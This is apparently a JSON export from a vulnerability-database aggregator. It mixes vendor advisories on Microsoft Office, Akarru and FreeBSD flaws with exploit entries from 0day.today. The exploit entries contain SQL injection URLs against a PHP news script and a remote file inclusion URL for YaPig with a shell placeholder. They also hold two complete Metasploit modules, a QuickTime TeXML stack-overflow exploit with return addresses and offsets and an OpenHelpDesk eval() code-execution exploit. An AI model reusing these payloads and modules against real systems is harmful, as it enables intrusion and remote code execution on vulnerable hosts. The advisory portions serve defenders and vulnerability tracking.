{"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-21T00:14:06", "bulletinFamily": "info", "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information and gain privileges.\n\n### *Affected products*:\nMicrosoft Office 2007 Service Pack 3 \nMicrosoft Office 2010 Service Pack 2 \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Office 2013 Service Pack 1 \nMicrosoft Office 2016 \nMicrosoft Office 2016 for Mac \nMicrosoft Office Compatibility Pack Service Pack 3 \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft Office Web Apps Server 2013 Service Pack 1 \nMicrosoft Office Word Viewer \nMicrosoft Office for Mac 2011 \nMicrosoft Excel 2007 Service Pack 3 \nMicrosoft Excel 2010 Service Pack 2 \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 \nMicrosoft Excel 2016 \nMicrosoft Excel 2016 for Mac \nMicrosoft Excel Viewer 2007 Service Pack 3 \nMicrosoft Excel Web App 2013 Service Pack 1 \nMicrosoft Excel for Mac 2011 \nMicrosoft Live Meeting 2007 Add-in \nMicrosoft Live Meeting 2007 Console \nMicrosoft Lync 2010 \nMicrosoft Lync 2010 Attendee \nMicrosoft Lync 2013 Service Pack 1 \nMicrosoft Lync Basic 2013 Service Pack 1 \nMicrosoft Outlook 2007 Service Pack 3 \nMicrosoft Outlook 2010 Service Pack 2 \nMicrosoft Outlook 2013 \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft Outlook 2016 \nMicrosoft PowerPoint 2007 Service Pack 3 \nMicrosoft PowerPoint 2010 Service Pack 2 \nMicrosoft PowerPoint 2013 RT Service Pack 1 \nMicrosoft PowerPoint 2013 Service Pack 1 \nMicrosoft PowerPoint 2016 \nMicrosoft PowerPoint Viewer 2007 \nMicrosoft Publisher 2007 Service Pack 3 \nMicrosoft Publisher 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft SharePoint Server 2013 Service Pack 1 \nOffice Online Server \nSkype for Business 2016 \nSkype for Business 2016 Basic\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[ADV170015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170015>) \n[CVE-2017-8567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8567>) \n[CVE-2017-8632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8632>) \n[CVE-2017-8630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8630>) \n[CVE-2017-8631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8631>) \n[CVE-2017-8682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8682>) \n[CVE-2017-8744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8744>) \n[CVE-2017-8745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8745>) \n[CVE-2017-8742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8742>) \n[CVE-2017-8695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8695>) \n[CVE-2017-8696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8696>) \n[CVE-2017-8629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8629>) \n[CVE-2017-8725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8725>) \n[CVE-2017-8676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8676>) \n[CVE-2017-8743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8743>) \n[CVE-2017-8676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8676>) \n[CVE-2017-8682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8682>) \n[CVE-2017-8695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8695>) \n[CVE-2017-8696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8696>) \n[CVE-2017-8745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8745>) \n[CVE-2017-8744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8744>) \n[CVE-2017-8743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8743>) \n[CVE-2017-8742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8742>) \n[CVE-2017-8725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8725>) \n[CVE-2017-8632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8632>) \n[CVE-2017-8631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8631>) \n[CVE-2017-8630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8630>) \n[CVE-2017-8629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8629>) \n[CVE-2017-8567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8567>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office Live Meeting 2007](<https://threats.kaspersky.com/en/product/Microsoft-Office-Live-Meeting-2007/>)\n\n### *CVE-IDS*:\n[CVE-2017-8676](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8676>)2.1Critical \n[CVE-2017-8682](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8682>)9.3Critical \n[CVE-2017-8695](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8695>)2.6Critical \n[CVE-2017-8696](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8696>)7.6Critical \n[CVE-2017-8745](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8745>)3.5Critical \n[CVE-2017-8744](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8744>)9.3Critical \n[CVE-2017-8743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8743>)9.3Critical \n[CVE-2017-8742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8742>)9.3Critical \n[CVE-2017-8725](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8725>)9.3Critical \n[CVE-2017-8632](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8632>)9.3Critical \n[CVE-2017-8631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8631>)9.3Critical \n[CVE-2017-8630](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8630>)9.3Critical \n[CVE-2017-8629](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8629>)3.5Critical \n[CVE-2017-8567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8567>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3213649](<http://support.microsoft.com/kb/3213649>) \n[3213644](<http://support.microsoft.com/kb/3213644>) \n[3213646](<http://support.microsoft.com/kb/3213646>) \n[3213641](<http://support.microsoft.com/kb/3213641>) \n[3213642](<http://support.microsoft.com/kb/3213642>) \n[3213560](<http://support.microsoft.com/kb/3213560>) \n[4025867](<http://support.microsoft.com/kb/4025867>) \n[3213562](<http://support.microsoft.com/kb/3213562>) \n[3213564](<http://support.microsoft.com/kb/3213564>) \n[3191831](<http://support.microsoft.com/kb/3191831>) \n[4011117](<http://support.microsoft.com/kb/4011117>) \n[3128030](<http://support.microsoft.com/kb/3128030>) \n[4025868](<http://support.microsoft.com/kb/4025868>) \n[3213631](<http://support.microsoft.com/kb/3213631>) \n[4025865](<http://support.microsoft.com/kb/4025865>) \n[4025866](<http://support.microsoft.com/kb/4025866>) \n[4011113](<http://support.microsoft.com/kb/4011113>) \n[3213638](<http://support.microsoft.com/kb/3213638>) \n[4011069](<http://support.microsoft.com/kb/4011069>) \n[3141537](<http://support.microsoft.com/kb/3141537>) \n[4011041](<http://support.microsoft.com/kb/4011041>) \n[4011040](<http://support.microsoft.com/kb/4011040>) \n[4011065](<http://support.microsoft.com/kb/4011065>) \n[4011064](<http://support.microsoft.com/kb/4011064>) \n[4011089](<http://support.microsoft.com/kb/4011089>) \n[4011062](<http://support.microsoft.com/kb/4011062>) \n[4011061](<http://support.microsoft.com/kb/4011061>) \n[4011134](<http://support.microsoft.com/kb/4011134>) \n[3213658](<http://support.microsoft.com/kb/3213658>) \n[3213626](<http://support.microsoft.com/kb/3213626>) \n[3203474](<http://support.microsoft.com/kb/3203474>) \n[3213551](<http://support.microsoft.com/kb/3213551>) \n[3212225](<http://support.microsoft.com/kb/3212225>) \n[4011056](<http://support.microsoft.com/kb/4011056>) \n[4011055](<http://support.microsoft.com/kb/4011055>) \n[4011050](<http://support.microsoft.com/kb/4011050>) \n[4011038](<http://support.microsoft.com/kb/4011038>) \n[4011063](<http://support.microsoft.com/kb/4011063>) \n[4011107](<http://support.microsoft.com/kb/4011107>) \n[3128027](<http://support.microsoft.com/kb/3128027>) \n[4025869](<http://support.microsoft.com/kb/4025869>) \n[4011090](<http://support.microsoft.com/kb/4011090>) \n[4011091](<http://support.microsoft.com/kb/4011091>) \n[3114428](<http://support.microsoft.com/kb/3114428>) \n[4011103](<http://support.microsoft.com/kb/4011103>) \n[4011126](<http://support.microsoft.com/kb/4011126>) \n[4011127](<http://support.microsoft.com/kb/4011127>) \n[3213632](<http://support.microsoft.com/kb/3213632>) \n[4011108](<http://support.microsoft.com/kb/4011108>) \n[4011125](<http://support.microsoft.com/kb/4011125>) \n[4011110](<http://support.microsoft.com/kb/4011110>)", "modified": "2019-03-07T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11100", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11100", "title": "\r KLA11100Multiple vulnerabilities in Microsoft Office ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-11T05:28:20", "bulletinFamily": "exploit", "description": "Newssystem", "modified": "2012-12-22T00:00:00", "published": "2012-12-22T00:00:00", "id": "1337DAY-ID-20031", "href": "https://0day.today/exploit/description/20031", "type": "zdt", "title": "NEWSolved SQL Injection Vulnerability", "sourceData": "SQLi:\r\nhttp://127.0.0.1/newsscript.php?m=archive&topic_check=ok&idneu=-1' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--'\r\n\r\nhttp://127.0.0.1/newsscript.php?mailto=ok&newsid=-1' UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--'\r\n\r\nbSQLi:\r\nhttp://127.0.0.1/newsscript.php?comments=ok&snews_id=1' AND 1=1--'\r\n\r\nGreetz 2 fraggle\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20031"}, {"lastseen": "2018-04-14T15:47:31", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-06-28T00:00:00", "published": "2012-06-28T00:00:00", "id": "1337DAY-ID-18858", "href": "https://0day.today/exploit/description/18858", "type": "zdt", "title": "Apple QuickTime TeXML Stack Buffer Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple QuickTime. When handling\r\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\r\n gain arbitrary code execution under the context of the user. The flaw is\r\n generally known as a bug while processing the 'transform' attribute, however,\r\n that attack vector seems to only cause a TerminateProcess call due to a corrupt\r\n stack cookie, and more data will only trigger a warning about the malformed XML\r\n file. This module exploits the 'color' value instead, which accomplishes the same\r\n thing.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alexander Gavrun', # Vulnerability Discovery\r\n 'sinn3r', # Metasploit Module\r\n 'juan vazquez' # Metasploit Module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '81934' ],\r\n [ 'CVE', '2012-0663' ],\r\n [ 'BID', '53571' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT1222' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x00\\x23\\x25\\x3c\\x3e\\x7d\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'QuickTime 7.7.1 on Windows XP SP3',\r\n {\r\n 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)\r\n 'Offset' => 643,\r\n 'Max' => 13508\r\n }\r\n ],\r\n [ 'QuickTime 7.7.0 on Windows XP SP3',\r\n {\r\n 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)\r\n 'Offset' => 643,\r\n 'Max' => 13508\r\n }\r\n ],\r\n [ 'QuickTime 7.6.9 on Windows XP SP3',\r\n {\r\n 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)\r\n 'Offset' => 643,\r\n 'Max' => 13508\r\n }\r\n ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'May 15 2012'))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n my_payload = rand_text(target['Offset'])\r\n my_payload << generate_seh_record(target.ret)\r\n my_payload << payload.encoded\r\n my_payload << rand_text(target['Max'] - my_payload.length)\r\n \r\n texml = <<-eos\r\n <?xml version=\"1.0\"?>\r\n <?quicktime type=\"application/x-quicktime-texml\"?>\r\n \r\n <text3GTrack trackWidth=\"176.0\" trackHeight=\"60.0\" layer=\"1\"\r\n language=\"eng\" timeScale=\"600\"\r\n transform=\"matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)\">\r\n <sample duration=\"2400\" keyframe=\"true\">\r\n \r\n <description format=\"tx3g\" displayFlags=\"ScrollIn\"\r\n horizontalJustification=\"Left\"\r\n verticalJustification=\"Top\"\r\n backgroundColor=\"0%, 0%, 0%, 100%\">\r\n \r\n <defaultTextBox x=\"0\" y=\"0\" width=\"176\" height=\"60\"/>\r\n <fontTable>\r\n <font id=\"1\" name=\"Times\"/>\r\n </fontTable>\r\n \r\n <sharedStyles>\r\n <style id=\"1\">\r\n {font-table: 1} {font-size: 10}\r\n {font-style:normal}\r\n {font-weight: normal}\r\n {color: #{my_payload}%, 100%, 100%, 100%}\r\n </style>\r\n </sharedStyles>\r\n </description>\r\n \r\n <sampleData scrollDelay=\"200\"\r\n highlightColor=\"25%, 45%, 65%, 100%\"\r\n targetEncoding=\"utf8\">\r\n \r\n <textBox x=\"10\" y=\"10\" width=\"156\" height=\"40\"/>\r\n <text styleID=\"1\">What you need... Metasploit!</text>\r\n <highlight startMarker=\"1\" endMarker=\"2\"/>\r\n <blink startMarker=\"3\" endMarker=\"4\"/>\r\n </sampleData>\r\n </sample>\r\n </text3GTrack>\r\n eos\r\n \r\n texml = texml.gsub(/^\\t\\t/,'')\r\n \r\n print_status(\"Creating '#{datastore['FILENAME']}'.\")\r\n file_create(texml)\r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18858"}, {"lastseen": "2018-02-06T03:19:22", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-04-12T00:00:00", "published": "2010-04-12T00:00:00", "id": "1337DAY-ID-11735", "href": "https://0day.today/exploit/description/11735", "type": "zdt", "title": "YaPig v0.94.0u Remote File Inclusion Vulnerability", "sourceData": "==================================================\r\nYaPig v0.94.0u Remote File Inclusion Vulnerability\r\n==================================================\r\n\r\n |=-----------------------------------------------------=|\r\n |=-------------=[ JIKO |No-exploit.Com| ]=-----------=|\r\n |=-----------------------------------------------------=|\r\n[~]-----------|00|\r\nNAme :JIKO (JAWAD)\r\nHome :No-exploit.Com\r\nMail : !x!\r\n[~]-----------|01|\r\n -{Script}\r\n name :YaPig V0.94.0u\r\n link :http://yapig.sourceforge.net/\r\n \r\n[~]-----------|02|\r\n -{3xpl01t}\r\n http://no-exploit.com/last_gallery.php?YAPIG_PATH={Shell}\r\n[~]-----------|03|\r\n -{Greetz}\r\n Cyber-Zone,HxH,Hussin X,ZaIdOoHxHaCkEr ,Stack,HiSoKa,The SadHacker,SkuLL-HacKeR ,Dr.NaNo\r\n |No-Exploit.com Members\r\n-------------------------------------\r\n\r\n\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11735"}, {"lastseen": "2018-04-09T16:53:45", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-02-02T00:00:00", "published": "2009-02-02T00:00:00", "id": "1337DAY-ID-4776", "href": "https://0day.today/exploit/description/4776", "type": "zdt", "title": "OpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)", "sourceData": "=========================================================\r\nOpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)\r\n=========================================================\r\n\r\n\r\n##\r\n# $Id: php_eval.rb 5783 2008-10-23 02:43:21Z ramon $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/projects/Framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'OpenHelpDesk eval (previously unpublished)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tOpenHelpDesk version 1.0.100 is vulnerable to a php code\r\n\t\t\t\texecution vulnerability due to improper use of eval().\r\n\t\t\t\tThe php.ini register_globals directive is *not* required to be\r\n\t\t\t\ton to exploit this vulnerability. There is no known public\r\n\t\t\t\texploit for this vulnerability.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'LSO <[email\u00a0protected]>' ],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' => [ 'URL' , 'http://sourceforge.net/projects/openhelpdesk' ],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n\t\t\t'Payload' => \r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4000, # max url length for some old\r\n\t\t\t\t\t\t\t\t\t\t\t# versions of apache according to\r\n\t\t\t\t\t\t\t\t\t\t\t# http://www.boutell.com/newfaq/misc/urllength.html\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'BadChars' => %q|'\"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install\r\n\t\t\t\t\t'Compat' => \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => 'find',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t'Keys' => ['php'],\r\n\t\t\t\t},\r\n\t\t\t'Targets' => [ ['Automatic', { }], ],\r\n\t\t\t'DefaultTarget' => 0\r\n\t\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URIPATH', [ true, \"The URI of ajax.php \", '/openhelpdesk/ajax.php']),\r\n\t\t\t], self.class)\r\n\t\r\n\tend\r\n\r\n\tdef check\r\n\t\ttester = rand_text_alpha(10)\r\n\t\tphp_code = \"echo('#{tester}');\"\r\n\r\n\t\tresponse = eval_sploit(php_code)\r\n\r\n\t\t#print_status(response)\r\n\t\tif (response && response.body.match(tester).to_a.first)\r\n\t\t\tprint_status(\"PHP code execution achieved; safe_mode or disable_functions might still prevent host compromise\")\r\n\t\t\tcheckcode = Exploit::CheckCode::Vulnerable\r\n\t\telse\r\n\t\t\tcheckcode = Exploit::CheckCode::Safe\r\n\t\tend\r\n\t\treturn checkcode\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tresponse = eval_sploit(payload.encoded)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef eval_sploit(php_code)\r\n\t\turi = datastore['URIPATH'] + \"?function=\" + php_code + \"//\"\r\n\t\tresponse = send_request_raw({ 'uri' => uri },1)\r\n\t\treturn response\r\n\tend\r\nend\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4776"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nAkarru Social BookMarking Engine SQL Injection Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19112\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19112/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nManipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nAkarru Social BookMarking Engine 0.x\r\nhttp://secunia.com/product/8567/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Akarru Social BookMarking\r\nEngine, which can be exploited by malicious people to conduct SQL\r\ninjection attacks.\r\n\r\nInput passed to the user name in users.php isn't properly sanitised\r\nbefore being used in a SQL query. This can be exploited to manipulate\r\nSQL queries by injecting arbitrary SQL code.\r\n\r\nThe vulnerability has been reported in versions prior to 0.4.3.4.\r\n\r\nSOLUTION:\r\nUpdate to version 0.4.3.4.\r\nhttp://sourceforge.net/project/showfiles.php?group_id=155783\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nThe vendor credits Ricardo Galli.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://sourceforge.net/project/shownotes.php?release_id=398713&group_id=155783\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-08T00:00:00", "published": "2006-03-08T00:00:00", "id": "SECURITYVULNS:DOC:11735", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11735", "title": "[SA19112] Akarru Social BookMarking Engine SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nWant a new IT Security job?\r\n\r\nVacant positions at Secunia:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nFreeBSD Kernel Memory Disclosure Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA15262\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/15262/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nFreeBSD 5.x\r\nhttp://secunia.com/product/1132/\r\nFreeBSD 4.x\r\nhttp://secunia.com/product/139/\r\n\r\nDESCRIPTION:\r\nChristian S.J. Peron has reported some vulnerabilities in FreeBSD,\r\nwhich can be exploited by malicious, local users to gain knowledge of\r\npotentially sensitive information.\r\n\r\nThe vulnerabilities are caused due to various errors in the kernel\r\nwhere variable-sized input is passed to applications in fixed-length\r\nbuffers without zeroing the unused portion of the buffers.\r\n\r\nSuccessful exploitation discloses random data in kernel memory.\r\n\r\nSOLUTION:\r\nUpdate FreeBSD or apply patch.\r\n\r\nFixed versions:\r\n2005-05-06 02:50:00 UTC (RELENG_5, 5.4-STABLE)\r\n2005-05-06 02:51:10 UTC (RELENG_5_4, 5.4-RELEASE)\r\n2005-05-06 02:50:35 UTC (RELENG_5_3, 5.3-RELEASE-p13)\r\n2005-05-06 02:48:46 UTC (RELENG_4, 4.11-STABLE)\r\n2005-05-06 02:49:35 UTC (RELENG_4_11, 4.11-RELEASE-p7)\r\n2005-05-06 02:49:08 UTC (RELENG_4_10, 4.10-RELEASE-p12)\r\n\r\nPatch for FreeBSD 4.x:\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem4.patch\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem4.patch.asc\r\n\r\nPatch for FreeBSD 5.x:\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem5.patch\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem5.patch.asc\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nChristian S.J. Peron\r\n\r\nORIGINAL ADVISORY:\r\nftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:08.kmem.asc\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-05-06T00:00:00", "published": "2005-05-06T00:00:00", "id": "SECURITYVULNS:DOC:8567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8567", "title": "[SA15262] FreeBSD Kernel Memory Disclosure Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "description": "/dev/iir weak permissions, kernel memory disclosure.", "modified": "2005-05-06T00:00:00", "published": "2005-05-06T00:00:00", "id": "SECURITYVULNS:VULN:4776", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4776", "title": "Multiple FreeBSD vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
